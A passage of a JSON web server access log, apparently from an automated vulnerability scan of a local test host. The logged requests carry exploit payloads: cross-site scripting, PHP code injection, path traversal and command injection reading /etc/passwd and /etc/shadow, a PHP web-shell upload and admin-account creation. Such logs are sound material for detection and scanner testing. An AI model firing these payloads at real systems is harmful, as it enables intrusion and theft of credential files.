HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.164","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/297MU4khZSm0BlR4B19VvUi9QMp/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/12 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aworkreap_award_temp_file_uploader\x0D\x0A-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22award_img\x22; filename=\x22297MTy5ad9jUNXuD0Uc24qayrm7.php\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------cd0dc6bdc00b1cf9--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/workreap-temp/297MTy5ad9jUNXuD0Uc24qayrm7.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pools/default/buckets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTxRRaLseT71HbdIUOPm9Rzt/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTxRRaLseT71HbdIUOPm9Rzt/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html 